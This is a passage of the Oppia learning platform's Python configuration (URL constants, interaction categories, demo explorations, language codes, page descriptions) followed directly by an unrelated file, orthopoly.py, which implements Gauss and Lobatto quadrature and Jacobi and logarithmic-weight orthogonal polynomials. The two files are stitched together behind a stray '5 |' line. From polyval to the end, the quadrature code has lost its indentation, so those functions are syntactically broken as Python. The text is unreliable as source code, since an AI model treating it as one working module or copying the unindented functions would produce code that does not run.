        'dir': os.path.join(RTE_EXTENSIONS_DIR, 'Link')
    },
    'Math': {
        'dir': os.path.join(RTE_EXTENSIONS_DIR, 'Math')
    },
    'Tabs': {
        'dir': os.path.join(RTE_EXTENSIONS_DIR, 'Tabs')
    },
    'Video': {
        'dir': os.path.join(RTE_EXTENSIONS_DIR, 'Video')
    },
}
# These categories and interactions are displayed in the order in which they
# appear in the interaction selector.
ALLOWED_INTERACTION_CATEGORIES = [{
    'name': 'General',
    'interaction_ids': [
        'Continue',
        'EndExploration',
        'ImageClickInput',
        'ItemSelectionInput',
        'MultipleChoiceInput',
        'TextInput'
    ],
}, {
    'name': 'Math',
    'interaction_ids': [
        'GraphInput',
        'LogicProof',
        'NumericInput',
        'SetInput',
        'MathExpressionInput',
    ]
}, {
    'name': 'Programming',
    'interaction_ids': [
        'CodeRepl',
        'PencilCodeEditor',
    ],
}, {
    'name': 'Music',
    'interaction_ids': [
        'MusicNotesInput'
    ],
}, {
    'name': 'Geography',
    'interaction_ids': [
        'InteractiveMap'
    ],
}]

ALLOWED_GADGETS = {
    'ScoreBar': {
        'dir': os.path.join(GADGETS_DIR, 'ScoreBar')
    },
}
# Gadgets subclasses must specify a valid panel option from this list.
ALLOWED_GADGET_PANELS = ['bottom']
# Demo explorations to load through the admin panel. The id assigned to each
# exploration is based on the key of the exploration in this dict, so ensure it
# doesn't change once it's in the list. Only integer-based indices should be
# used in this list, as it maintains backward compatibility with how demo
# explorations used to be assigned IDs. The value of each entry in this dict is
# either a YAML file or a directory (depending on whether it ends in .yaml).
# These explorations can be found under data/explorations.
DEMO_EXPLORATIONS = {
    u'0': 'welcome.yaml',
    u'1': 'multiples.yaml',
    u'2': 'binary_search',
    u'3': 'root_linear_coefficient_theorem.yaml',
    u'4': 'three_balls',
    # TODO(bhenning): Replace demo exploration '5' with a new exploration
    # described in #1376.
    u'6': 'boot_verbs.yaml',
    u'7': 'hola.yaml',
    u'8': 'adventure.yaml',
    u'9': 'pitch_perfect.yaml',
    u'10': 'test_interactions',
    u'11': 'modeling_graphs',
    u'12': 'protractor_test_1.yaml',
    u'13': 'solar_system',
    u'14': 'about_oppia.yaml',
    u'15': 'classifier_demo_exploration.yaml',
    u'16': 'all_interactions',
}

DEMO_COLLECTIONS = {
    u'0': 'welcome_to_collections.yaml'
}
# IDs of explorations which should not be displayable in either the learner or
# editor views.
DISABLED_EXPLORATION_IDS = ['5']
# Google Group embed URL for the Forum page.
EMBEDDED_GOOGLE_GROUP_URL = (
    'https://groups.google.com/forum/embed/?place=forum/oppia')
# Whether to allow YAML file uploads.
ALLOW_YAML_FILE_UPLOAD = False
# Prefix for all taskqueue-related URLs.
TASKQUEUE_URL_PREFIX = '/task'
TASK_URL_FEEDBACK_MESSAGE_EMAILS = (
    '%s/email/batchfeedbackmessageemailhandler' % TASKQUEUE_URL_PREFIX)
TASK_URL_FEEDBACK_STATUS_EMAILS = (
    '%s/email/feedbackthreadstatuschangeemailhandler' % TASKQUEUE_URL_PREFIX)
TASK_URL_FLAG_EXPLORATION_EMAILS = (
    '%s/email/flagexplorationemailhandler' % TASKQUEUE_URL_PREFIX)
TASK_URL_INSTANT_FEEDBACK_EMAILS = (
    '%s/email/instantfeedbackmessageemailhandler' % TASKQUEUE_URL_PREFIX)
TASK_URL_SUGGESTION_EMAILS = (
    '%s/email/suggestionemailhandler' % TASKQUEUE_URL_PREFIX)
# TODO(sll): Add all other URLs here.
ADMIN_URL = '/admin'
COLLECTION_DATA_URL_PREFIX = '/collection_handler/data'
EDITABLE_COLLECTION_DATA_URL_PREFIX = '/collection_editor_handler/data'
COLLECTION_RIGHTS_PREFIX = '/collection_editor_handler/rights'
COLLECTION_EDITOR_URL_PREFIX = '/collection_editor/create'
COLLECTION_URL_PREFIX = '/collection'
DASHBOARD_URL = '/dashboard'
DASHBOARD_CREATE_MODE_URL = '%s?mode=create' % DASHBOARD_URL
DASHBOARD_DATA_URL = '/dashboardhandler/data'
DASHBOARD_EXPLORATION_STATS_PREFIX = '/dashboardhandler/explorationstats'
EDITOR_URL_PREFIX = '/create'
EXPLORATION_DATA_PREFIX = '/createhandler/data'
EXPLORATION_INIT_URL_PREFIX = '/explorehandler/init'
EXPLORATION_METADATA_SEARCH_URL = '/exploration/metadata_search'
EXPLORATION_RIGHTS_PREFIX = '/createhandler/rights'
EXPLORATION_SUMMARIES_DATA_URL = '/explorationsummarieshandler/data'
EXPLORATION_URL_PREFIX = '/explore'
EXPLORATION_URL_EMBED_PREFIX = '/embed/exploration'
FEEDBACK_STATS_URL_PREFIX = '/feedbackstatshandler'
FEEDBACK_THREAD_URL_PREFIX = '/threadhandler'
FEEDBACK_THREADLIST_URL_PREFIX = '/threadlisthandler'
FEEDBACK_THREAD_VIEW_EVENT_URL = '/feedbackhandler/thread_view_event'
FLAG_EXPLORATION_URL_PREFIX = '/flagexplorationhandler'
LIBRARY_GROUP_DATA_URL = '/librarygrouphandler'
LIBRARY_INDEX_URL = '/library'
LIBRARY_INDEX_DATA_URL = '/libraryindexhandler'
LIBRARY_RECENTLY_PUBLISHED_URL = '/library/recently_published'
LIBRARY_SEARCH_URL = '/search/find'
LIBRARY_SEARCH_DATA_URL = '/searchhandler/data'
LIBRARY_TOP_RATED_URL = '/library/top_rated'
NEW_COLLECTION_URL = '/collection_editor_handler/create_new'
NEW_EXPLORATION_URL = '/contributehandler/create_new'
RECENT_COMMITS_DATA_URL = '/recentcommitshandler/recent_commits'
RECENT_FEEDBACK_MESSAGES_DATA_URL = '/recent_feedback_messages'
ROBOTS_TXT_URL = '/robots.txt'
SITE_FEEDBACK_FORM_URL = ''
SITE_LANGUAGE_DATA_URL = '/save_site_language'
SIGNUP_DATA_URL = '/signuphandler/data'
SIGNUP_URL = '/signup'
SPLASH_URL = '/splash'
SUGGESTION_ACTION_URL_PREFIX = '/suggestionactionhandler'
SUGGESTION_LIST_URL_PREFIX = '/suggestionlisthandler'
SUGGESTION_URL_PREFIX = '/suggestionhandler'
UPLOAD_EXPLORATION_URL = '/contributehandler/upload'
USERNAME_CHECK_DATA_URL = '/usernamehandler/data'
NAV_MODE_ABOUT = 'about'
NAV_MODE_BLOG = 'blog'
NAV_MODE_COLLECTION = 'collection'
NAV_MODE_CONTACT = 'contact'
NAV_MODE_CREATE = 'create'
NAV_MODE_DASHBOARD = 'dashboard'
NAV_MODE_DONATE = 'donate'
NAV_MODE_EXPLORE = 'explore'
NAV_MODE_LIBRARY = 'library'
NAV_MODE_PROFILE = 'profile'
NAV_MODE_SIGNUP = 'signup'
NAV_MODE_SPLASH = 'splash'
NAV_MODE_TEACH = 'teach'
NAV_MODE_THANKS = 'thanks'
# Event types.
EVENT_TYPE_STATE_HIT = 'state_hit'
EVENT_TYPE_ANSWER_SUBMITTED = 'answer_submitted'
EVENT_TYPE_DEFAULT_ANSWER_RESOLVED = 'default_answer_resolved'
EVENT_TYPE_NEW_THREAD_CREATED = 'feedback_thread_created'
EVENT_TYPE_THREAD_STATUS_CHANGED = 'feedback_thread_status_changed'
EVENT_TYPE_RATE_EXPLORATION = 'rate_exploration'
# The values for these event types should be left as-is for backwards
# compatibility.
EVENT_TYPE_START_EXPLORATION = 'start'
EVENT_TYPE_MAYBE_LEAVE_EXPLORATION = 'leave'
EVENT_TYPE_COMPLETE_EXPLORATION = 'complete'
ACTIVITY_STATUS_PRIVATE = 'private'
ACTIVITY_STATUS_PUBLIC = 'public'
ACTIVITY_STATUS_PUBLICIZED = 'publicized'
# Play type constants
PLAY_TYPE_PLAYTEST = 'playtest'
PLAY_TYPE_NORMAL = 'normal'
# Predefined commit messages.
COMMIT_MESSAGE_EXPLORATION_DELETED = 'Exploration deleted.'
COMMIT_MESSAGE_COLLECTION_DELETED = 'Collection deleted.'
# Unfinished features.
SHOW_TRAINABLE_UNRESOLVED_ANSWERS = False
# Number of unresolved answers to be displayed in the dashboard for each
# exploration.
TOP_UNRESOLVED_ANSWERS_COUNT_DASHBOARD = 3
# Number of open feedback to be displayed in the dashboard for each exploration.
OPEN_FEEDBACK_COUNT_DASHBOARD = 3
# NOTE TO DEVELOPERS: This should be synchronized with base.js
ENABLE_STRING_CLASSIFIER = False
SHOW_COLLECTION_NAVIGATION_TAB_HISTORY = False
SHOW_COLLECTION_NAVIGATION_TAB_STATS = False
# Output formats of downloaded explorations.
OUTPUT_FORMAT_JSON = 'json'
OUTPUT_FORMAT_ZIP = 'zip'
# Types of updates shown in the 'recent updates' table in the dashboard page.
UPDATE_TYPE_EXPLORATION_COMMIT = 'exploration_commit'
UPDATE_TYPE_COLLECTION_COMMIT = 'collection_commit'
UPDATE_TYPE_FEEDBACK_MESSAGE = 'feedback_thread'
# Possible values for user query status.
# Valid status transitions are: processing --> completed --> archived
# Or processing --> failed.
USER_QUERY_STATUS_PROCESSING = 'processing'
USER_QUERY_STATUS_COMPLETED = 'completed'
USER_QUERY_STATUS_ARCHIVED = 'archived'
USER_QUERY_STATUS_FAILED = 'failed'
# The time difference between which to consider two login events "close". This
# is taken to be 12 hours.
PROXIMAL_TIMEDELTA_SECS = 12 * 60 * 60
DEFAULT_COLOR = '#a33f40'
DEFAULT_THUMBNAIL_ICON = 'Lightbulb'
# List of supported default categories. For now, each category has a specific
# color associated with it. Each category also has a thumbnail icon whose
# filename is "{{CategoryName}}.svg".
CATEGORIES_TO_COLORS = {
    'Mathematics': '#cd672b',
    'Algebra': '#cd672b',
    'Arithmetic': '#d68453',
    'Calculus': '#b86330',
    'Logic': '#d68453',
    'Combinatorics': '#cf5935',
    'Graph Theory': '#cf5935',
    'Probability': '#cf5935',
    'Statistics': '#cd672b',
    'Geometry': '#d46949',
    'Trigonometry': '#d46949',
    'Algorithms': '#d0982a',
    'Computing': '#bb8b2f',
    'Programming': '#d9aa53',
    'Astronomy': '#879d6c',
    'Biology': '#97a766',
    'Chemistry': '#aab883',
    'Engineering': '#8b9862',
    'Environment': '#aba86d',
    'Medicine': '#97a766',
    'Physics': '#879d6c',
    'Architecture': '#6e3466',
    'Art': '#895a83',
    'Music': '#6a3862',
    'Philosophy': '#613968',
    'Poetry': '#7f507f',
    'English': '#193a69',
    'Languages': '#1b4174',
    'Latin': '#3d5a89',
    'Reading': '#193a69',
    'Spanish': '#405185',
    'Gaulish': '#1b4174',
    'Business': '#387163',
    'Economics': '#5d8b7f',
    'Geography': '#3c6d62',
    'Government': '#538270',
    'History': '#3d6b52',
    'Law': '#538270',
    'Education': '#942e20',
    'Puzzles': '#a8554a',
    'Sport': '#893327',
    'Welcome': '#992a2b',
}
# Types of activities that can be created with Oppia.
ACTIVITY_TYPE_EXPLORATION = 'exploration'
ACTIVITY_TYPE_COLLECTION = 'collection'
ALL_ACTIVITY_TYPES = [ACTIVITY_TYPE_EXPLORATION, ACTIVITY_TYPE_COLLECTION]
# A sorted list of default categories for which icons and background colours
# exist.
ALL_CATEGORIES = sorted(CATEGORIES_TO_COLORS.keys())
# These categories are shown in the library navbar.
SEARCH_DROPDOWN_CATEGORIES = sorted([
    'Mathematics',
    'Statistics',
    'Algorithms',
    'Programming',
    'Biology',
    'Chemistry',
    'Physics',
    'Medicine',
    'English',
    'Architecture',
    'Art',
    'Music',
    'Reading',
    'Business',
    'Economics',
    'Geography',
    'History',
])
# The i18n id for the header of the "Featured Activities" category in the
# library index page.
LIBRARY_CATEGORY_FEATURED_ACTIVITIES = 'I18N_LIBRARY_GROUPS_FEATURED_ACTIVITIES'
# The i18n id for the header of the "Top Rated Explorations" category in the
# library index page.
LIBRARY_CATEGORY_TOP_RATED_EXPLORATIONS = (
    'I18N_LIBRARY_GROUPS_TOP_RATED_EXPLORATIONS')
# The i18n id for the header of the "Recently Published" category in the
# library index page.
LIBRARY_CATEGORY_RECENTLY_PUBLISHED = 'I18N_LIBRARY_GROUPS_RECENTLY_PUBLISHED'
# The group name that appears at the end of the url for the recently published
# page.
LIBRARY_GROUP_RECENTLY_PUBLISHED = 'recently_published'
# The group name that appears at the end of the url for the top rated page.
LIBRARY_GROUP_TOP_RATED = 'top_rated'
# NOTE TO DEVELOPERS: The LIBRARY_PAGE_MODE constants defined below should have
# the same value as the ones defined in LIBRARY_PAGE_MODES in Library.js. For
# example LIBRARY_PAGE_MODE_GROUP should have the same value as
# LIBRARY_PAGE_MODES.GROUP.
# Page mode for the group pages such as top rated and recently published
# explorations.
LIBRARY_PAGE_MODE_GROUP = 'group'
# Page mode for the main library page.
LIBRARY_PAGE_MODE_INDEX = 'index'
# Page mode for the search results page.
LIBRARY_PAGE_MODE_SEARCH = 'search'
# List of supported language codes. Each description has a
# parenthetical part that may be stripped out to give a shorter
# description.
ALL_LANGUAGE_CODES = [{
    'code': 'en', 'description': u'English',
}, {
    'code': 'ar', 'description': u'العربية (Arabic)',
}, {
    'code': 'bg', 'description': u'български (Bulgarian)',
}, {
    'code': 'ca', 'description': u'català (Catalan)',
}, {
    'code': 'zh', 'description': u'中文 (Chinese)',
}, {
    'code': 'hr', 'description': u'hrvatski (Croatian)',
}, {
    'code': 'cs', 'description': u'čeština (Czech)',
}, {
    'code': 'da', 'description': u'dansk (Danish)',
}, {
    'code': 'nl', 'description': u'Nederlands (Dutch)',
}, {
    'code': 'tl', 'description': u'Filipino (Filipino)',
}, {
    'code': 'fi', 'description': u'suomi (Finnish)',
}, {
    'code': 'fr', 'description': u'français (French)',
}, {
    'code': 'de', 'description': u'Deutsch (German)',
}, {
    'code': 'el', 'description': u'ελληνικά (Greek)',
}, {
    'code': 'he', 'description': u'עברית (Hebrew)',
}, {
    'code': 'hi', 'description': u'हिन्दी (Hindi)',
}, {
    'code': 'hu', 'description': u'magyar (Hungarian)',
}, {
    'code': 'id', 'description': u'Bahasa Indonesia (Indonesian)',
}, {
    'code': 'it', 'description': u'italiano (Italian)',
}, {
    'code': 'ja', 'description': u'日本語 (Japanese)',
}, {
    'code': 'ko', 'description': u'한국어 (Korean)',
}, {
    'code': 'lv', 'description': u'latviešu (Latvian)',
}, {
    'code': 'lt', 'description': u'lietuvių (Lithuanian)',
}, {
    'code': 'no', 'description': u'Norsk (Norwegian)',
}, {
    'code': 'fa', 'description': u'فارسی (Persian)',
}, {
    'code': 'pl', 'description': u'polski (Polish)',
}, {
    'code': 'pt', 'description': u'português (Portuguese)',
}, {
    'code': 'ro', 'description': u'română (Romanian)',
}, {
    'code': 'ru', 'description': u'русский (Russian)',
}, {
    'code': 'sr', 'description': u'српски (Serbian)',
}, {
    'code': 'sk', 'description': u'slovenčina (Slovak)',
}, {
    'code': 'sl', 'description': u'slovenščina (Slovenian)',
}, {
    'code': 'es', 'description': u'español (Spanish)',
}, {
    'code': 'sv', 'description': u'svenska (Swedish)',
}, {
    'code': 'th', 'description': u'ภาษาไทย (Thai)',
}, {
    'code': 'tr', 'description': u'Türkçe (Turkish)',
}, {
    'code': 'uk', 'description': u'українська (Ukrainian)',
}, {
    'code': 'vi', 'description': u'Tiếng Việt (Vietnamese)',
}]
# Defaults for topic similarities
DEFAULT_TOPIC_SIMILARITY = 0.5
SAME_TOPIC_SIMILARITY = 1.0
# NOTE TO DEVELOPERS: While adding another language, please ensure that the
# languages are in alphabetical order.
SUPPORTED_SITE_LANGUAGES = [{
    'id': 'id',
    'text': 'Bahasa Indonesia'
}, {
    'id': 'en',
    'text': 'English'
}, {
    'id': 'es',
    'text': 'Español'
}, {
    'id': 'pt',
    'text': 'Português'
}, {
    'id': 'pt-br',
    'text': 'Português (Brasil)'
}, {
    'id': 'vi',
    'text': 'Tiếng Việt'
}, {
    'id': 'hi',
    'text': 'हिन्दी'
}]
SYSTEM_USERNAMES = [SYSTEM_COMMITTER_ID, MIGRATION_BOT_USERNAME]
SYSTEM_USER_IDS = [SYSTEM_COMMITTER_ID, MIGRATION_BOT_USERNAME]
# The following are all page descriptions for the meta tag.
ABOUT_PAGE_DESCRIPTION = (
    'Oppia is an open source learning platform that connects a community of '
    'teachers and learners. You can use this site to create 1-1 learning '
    'scenarios for others.')
BLOG_PAGE_DESCRIPTION = (
    'Keep up to date with Oppia news and updates via our blog.')
CONTACT_PAGE_DESCRIPTION = (
    'Contact the Oppia team, submit feedback, and learn how to get involved '
    'with the Oppia project.')
CREATE_PAGE_DESCRIPTION = (
    'Help others learn new things. Create lessons through explorations and '
    'share your knowledge with the community.')
DASHBOARD_PAGE_DESCRIPTION = (
    'Keep track of the lessons you have created, as well as feedback from '
    'learners.')
DONATE_PAGE_DESCRIPTION = (
    'Donate to The Oppia Foundation.')
FORUM_PAGE_DESCRIPTION = (
    'Engage with the Oppia community by discussing questions, bugs and '
    'explorations in the forum.')
LIBRARY_GROUP_PAGE_DESCRIPTION = (
    'Discover top-rated or recently-published explorations on Oppia. Learn '
    'from these explorations or help improve an existing one for the '
    'community.')
LIBRARY_PAGE_DESCRIPTION = (
    'Looking to learn something new? Find explorations created by professors, '
    'teachers and Oppia users in a subject you\'re interested in, and start '
    'exploring!')
PREFERENCES_PAGE_DESCRIPTION = (
    'Change your Oppia profile settings and preferences')
SEARCH_PAGE_DESCRIPTION = (
    'Discover a new exploration to learn from, or help improve an existing '
    'one for the community.')
SIGNUP_PAGE_DESCRIPTION = (
    'Sign up for Oppia and begin exploring a new subject.')
SPLASH_PAGE_DESCRIPTION = (
    'Oppia is a free site for sharing knowledge via interactive lessons '
    'called \'explorations\'. Learn from user-created explorations, or teach '
    'and create your own.')
TEACH_PAGE_DESCRIPTION = (
    'The Oppia library is full of user-created lessons called \'explorations\'.'
    ' Read about how to participate in the community and begin creating '
    'explorations.')
TERMS_PAGE_DESCRIPTION = (
    'Oppia is a 501(c)(3) registered non-profit open-source e-learning '
    'platform. Learn about our terms and conditions for creating and '
    'distributing learning material.')
THANKS_PAGE_DESCRIPTION = (
    'Thank you for donating to The Oppia Foundation.')
SITE_NAME = 'Oppia.org'
# The type of the response returned by a handler when an exception is raised.
HANDLER_TYPE_HTML = 'html'
HANDLER_TYPE_JSON = 'json'
5 | """
orthopoly.py - A suite of functions for generating orthogonal polynomials
and quadrature rules.
Copyright (c) 2014 Greg von Winckel
All rights reserved.
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
Last updated on Wed Jan 1 14:29:25 MST 2014
Modified by David A. Ham (dummy@email.com), 2016
"""
import numpy as np
from functools import reduce
from math import gamma
def gauss(alpha, beta):
    """
    Compute the Gauss nodes and weights from the recursion
    coefficients associated with a set of orthogonal polynomials

    Inputs:
    alpha - recursion coefficients
    beta - recursion coefficients

    Outputs:
    x - quadrature nodes
    w - quadrature weights

    Adapted from the MATLAB code by Walter Gautschi
    http://www.cs.purdue.edu/archives/2002/wxg/codes/gauss.m
    """
    from numpy.linalg import eigh

    A = np.diag(np.sqrt(beta)[1:], 1) + np.diag(alpha)
    x, V = eigh(A, "U")
    w = beta[0] * np.real(np.power(V[0, :], 2))
    return x, w
def lobatto(alpha, beta, xl1, xl2):
    """
    Compute the Lobatto nodes and weights with the preassigned
    nodes xl1, xl2

    Inputs:
    alpha - recursion coefficients
    beta - recursion coefficients
    xl1 - assigned node location
    xl2 - assigned node location

    Outputs:
    x - quadrature nodes
    w - quadrature weights

    Based on Section 7 of the paper
    "Some modified matrix eigenvalue problems"
    by Gene Golub, SIAM Review Vol 15, No. 2, April 1973, pp.318--334
    """
    from numpy.linalg import solve

    n = len(alpha) - 1
    en = np.zeros(n)
    en[-1] = 1
    A1 = np.vstack((np.sqrt(beta), alpha - xl1))
    J1 = np.diag(A1[0, 1:-1], 1) + np.diag(A1[1, 1:]) + np.diag(A1[0, 1:-1], -1)
    A2 = np.vstack((np.sqrt(beta), alpha - xl2))
    J2 = np.diag(A2[0, 1:-1], 1) + np.diag(A2[1, 1:]) + np.diag(A2[0, 1:-1], -1)
    g1 = solve(J1, en)
    g2 = solve(J2, en)
    C = np.array(((1, -g1[-1]), (1, -g2[-1])))
    xl = np.array((xl1, xl2))
    ab = solve(C, xl)
    alphal = alpha
    alphal[-1] = ab[0]
    betal = beta
    betal[-1] = ab[1]
    x, w = gauss(alphal, betal)
    return x, w
def rec_jacobi(N, a, b):
    """
    Generate the recursion coefficients alpha_k, beta_k

    P_{k+1}(x) = (x-alpha_k)*P_{k}(x) - beta_k P_{k-1}(x)

    for the Jacobi polynomials which are orthogonal on [-1,1]
    with respect to the weight w(x)=[(1-x)^a]*[(1+x)^b]

    Inputs:
    N - polynomial order
    a - weight parameter
    b - weight parameter

    Outputs:
    alpha - recursion coefficients
    beta - recursion coefficients

    Adapted from the MATLAB code by Dirk Laurie and Walter Gautschi
    http://www.cs.purdue.edu/archives/2002/wxg/codes/r_jacobi.m
    """
    nu = (b - a) / float(a + b + 2)
    mu = 2 ** (a + b + 1) * gamma(a + 1) * gamma(b + 1) / gamma(a + b + 2)

    if N == 1:
        alpha = nu
        beta = mu
    else:
        n = np.arange(1.0, N)
        nab = 2 * n + a + b
        alpha = np.hstack((nu, (b ** 2 - a ** 2) / (nab * (nab + 2))))
        n = n[1:]
        nab = nab[1:]
        B1 = 4 * (a + 1) * (b + 1) / float((a + b + 2) ** 2 * (a + b + 3))
        B = 4 * (n + a) * (n + b) * n * (n + a + b) / \
            (nab ** 2 * (nab + 1) * (nab - 1))
        beta = np.hstack((mu, B1, B))

    return alpha, beta
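

# Example: a Gauss-Legendre rule is the a = b = 0 case of the Jacobi
# recursion above. This quick check (mine, not part of the original file)
# compares the 3-point rule against numpy:
#
#     alpha, beta = rec_jacobi(3, 0, 0)
#     x, w = gauss(alpha, beta)
#     # x ~ [-0.7745967, 0, 0.7745967], w ~ [5/9, 8/9, 5/9]
#     xr, wr = np.polynomial.legendre.leggauss(3)
#     assert np.allclose(x, xr) and np.allclose(w, wr)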
def rec_jacobi01(N, a, b):
    """
    Generate the recursion coefficients alpha_k, beta_k
    for the Jacobi polynomials which are orthogonal on [0,1]

    See rec_jacobi for the recursion coefficients on [-1,1]

    Inputs:
    N - polynomial order
    a - weight parameter
    b - weight parameter

    Outputs:
    alpha - recursion coefficients
    beta - recursion coefficients

    Adapted from the MATLAB implementation:
    https://www.cs.purdue.edu/archives/2002/wxg/codes/r_jacobi01.m
    """
    if a <= -1 or b <= -1:
        raise ValueError('''Jacobi coefficients are defined only
                         for alpha,beta > -1''')

    if not isinstance(N, int):
        raise TypeError('N must be an integer')

    if N < 1:
        raise ValueError('N must be at least 1')

    c, d = rec_jacobi(N, a, b)

    alpha = (1 + c) / 2
    beta = d / 4
    beta[0] = d[0] / 2 ** (a + b + 1)

    return alpha, beta
def polyval(alpha, beta, x):
"""
Evaluate polynomials on x given the recursion coefficients alpha and beta
"""
N = len(alpha)
m = len(x)
P = np.zeros((m, N + 1))
P[:, 0] = 1
P[:, 1] = (x - alpha[0]) * P[:, 0]
for k in range(1, N):
P[:, k + 1] = (x - alpha[k]) * P[:, k] - beta[k] * P[:, k - 1]
return P
def jacobi(N, a, b, x, NOPT=1):
"""
JACOBI computes the Jacobi polynomials which are orthogonal on [-1,1]
with respect to the weight w(x)=[(1-x)^a]*[(1+x)^b] and evaluate them
on the given grid up to P_N(x). Setting NOPT=2 returns the
L2-normalized polynomials
"""
m = len(x)
P = np.zeros((m, N + 1))
apb = a + b
a1 = a - 1
b1 = b - 1
c = apb * (a - b)
P[:, 0] = 1
if N > 0:
P[:, 1] = 0.5 * (a - b + (apb + 2) * x)
if N > 1:
for k in range(2, N + 1):
k2 = 2 * k
g = k2 + apb
g1 = g - 1
g2 = g - 2
d = 2.0 * (k + a1) * (k + b1) * g
P[:, k] = (g1 * (c + g2 * g * x) * P[:, k - 1] -
d * P[:, k - 2]) / (k2 * (k + apb) * g2)
if NOPT == 2:
k = np.arange(N + 1)
pnorm = 2 ** (apb + 1) * gamma(k + a + 1) * gamma(k + b + 1) / \
((2 * k + a + b + 1) * (gamma(k + 1) * gamma(k + a + b + 1)))
P *= 1 / np.sqrt(pnorm)
return P
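# --- Illustrative self-check (an added sketch, not part of the original
# module): with a = b = 0 the Jacobi polynomials reduce to the Legendre
# polynomials, all of which satisfy P_n(1) = 1.
def _demo_jacobi_endpoint():
    P = jacobi(4, 0, 0, np.array([1.0]))
    assert np.allclose(P, 1.0)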
def jacobiD(N, a, b, x, NOPT=1):
"""
JACOBID computes the first derivatives of the normalized Jacobi
polynomials which are orthogonal on [-1,1] with respect
to the weight w(x)=[(1-x)^a]*[(1+x)^b] and evaluate them
on the given grid up to P_N(x). Setting NOPT=2 returns
the derivatives of the L2-normalized polynomials
"""
z = np.zeros((len(x), 1))
if N == 0:
Px = z
else:
Px = 0.5 * np.hstack((z, jacobi(N - 1, a + 1, b + 1, x, NOPT) *
((a + b + 2 + np.arange(N)))))
return Px
def mm_log(N, a):
"""
MM_LOG Modified moments for a logarithmic weight function.
The call mm=MM_LOG(n,a) computes the first n modified moments of the
logarithmic weight function w(t)=t^a log(1/t) on [0,1] relative to
shifted Legendre polynomials.
REFERENCE: Walter Gautschi,``On the preceding paper `A Legendre
polynomial integral' by James L. Blue'',
Math. Comp. 33 (1979), 742-743.
Adapted from the MATLAB implementation:
https://www.cs.purdue.edu/archives/2002/wxg/codes/mm_log.m
"""
if a <= -1:
raise ValueError('Parameter a must be greater than -1')
prod = lambda z: reduce(lambda x, y: x * y, z, 1)
mm = np.zeros(N)
c = 1
for n in range(N):
if isinstance(a, int) and a < n:
p = range(n - a, n + a + 2)
mm[n] = (-1) ** (n - a) / prod(p)
mm[n] *= gamma(a + 1) ** 2
else:
if n == 0:
mm[0] = 1 / (a + 1) ** 2
else:
k = np.arange(1, n + 1)
s = 1 / (a + 1 + k) - 1 / (a + 1 - k)
p = (a + 1 - k) / (a + 1 + k)
mm[n] = (1 / (a + 1) + sum(s)) * prod(p) / (a + 1)
mm[n] *= c
c *= 0.5 * (n + 1) / (2 * n + 1)
return mm
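# --- Illustrative self-check (an added sketch, not part of the original
# module): the zeroth modified moment for a = 0 is the plain integral
# int_0^1 log(1/t) dt = 1.
def _demo_mm_log():
    mm = mm_log(4, 0)
    assert np.isclose(mm[0], 1.0)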
def mod_chebyshev(N, mom, alpham, betam):
"""
    Calculate the recursion coefficients for the orthogonal polynomials
    which are orthogonal with respect to a weight function which is
    represented in terms of its modified moments, which are obtained by
integrating the monic polynomials against the weight function.
References
----------
John C. Wheeler, "Modified moments and Gaussian quadratures"
Rocky Mountain Journal of Mathematics, Vol. 4, Num. 2 (1974), 287--296
Walter Gautschi, "Orthogonal Polynomials (in Matlab)
Journal of Computational and Applied Mathematics, Vol. 178 (2005) 215--234
Adapted from the MATLAB implementation:
https://www.cs.purdue.edu/archives/2002/wxg/codes/chebyshev.m
"""
if not isinstance(N, int):
raise TypeError('N must be an integer')
if N < 1:
raise ValueError('N must be at least 1')
N = min(N, int(len(mom) / 2))
alpha = np.zeros(N)
beta = np.zeros(N)
normsq = np.zeros(N)
sig = np.zeros((N + 1, 2 * N))
alpha[0] = alpham[0] + mom[1] / mom[0]
beta[0] = mom[0]
sig[1, :] = mom
for n in range(2, N + 1):
for m in range(n - 1, 2 * N - n + 1):
sig[n, m] = sig[n - 1, m + 1] - (alpha[n - 2] - alpham[m]) * sig[n - 1, m] - \
beta[n - 2] * sig[n - 2, m] + betam[m] * sig[n - 1, m - 1]
alpha[n - 1] = alpham[n - 1] + sig[n, n] / sig[n, n - 1] - sig[n - 1, n - 1] / \
sig[n - 1, n - 2]
beta[n - 1] = sig[n, n - 1] / sig[n - 1, n - 2]
normsq = np.diagonal(sig, -1)
return alpha, beta, normsq
def rec_jaclog(N, a):
"""
Generate the recursion coefficients alpha_k, beta_k
P_{k+1}(x) = (x-alpha_k)*P_{k}(x) - beta_k P_{k-1}(x)
for the monic polynomials which are orthogonal on [0,1]
with respect to the weight w(x)=x^a*log(1/x)
Inputs:
N - polynomial order
a - weight parameter
Outputs:
alpha - recursion coefficients
beta - recursion coefficients
    Adapted from the MATLAB code:
https://www.cs.purdue.edu/archives/2002/wxg/codes/r_jaclog.m
"""
alphaj, betaj = rec_jacobi01(2 * N, 0, 0)
mom = mm_log(2 * N, a)
alpha, beta, _ = mod_chebyshev(N, mom, alphaj, betaj)
return alpha, beta
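# --- Illustrative self-check (an added sketch, not part of the original
# module): for the weight w(x) = log(1/x) on [0, 1] (a = 0), the quadrature
# weights should sum to int_0^1 log(1/x) dx = 1, and a 3-point rule should
# capture int_0^1 x log(1/x) dx = 1/4 exactly.
def _demo_rec_jaclog():
    alpha, beta = rec_jaclog(3, 0)
    x, w = gauss(alpha, beta)
    assert np.isclose(w.sum(), 1.0)
    assert np.isclose(np.dot(w, x), 0.25)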
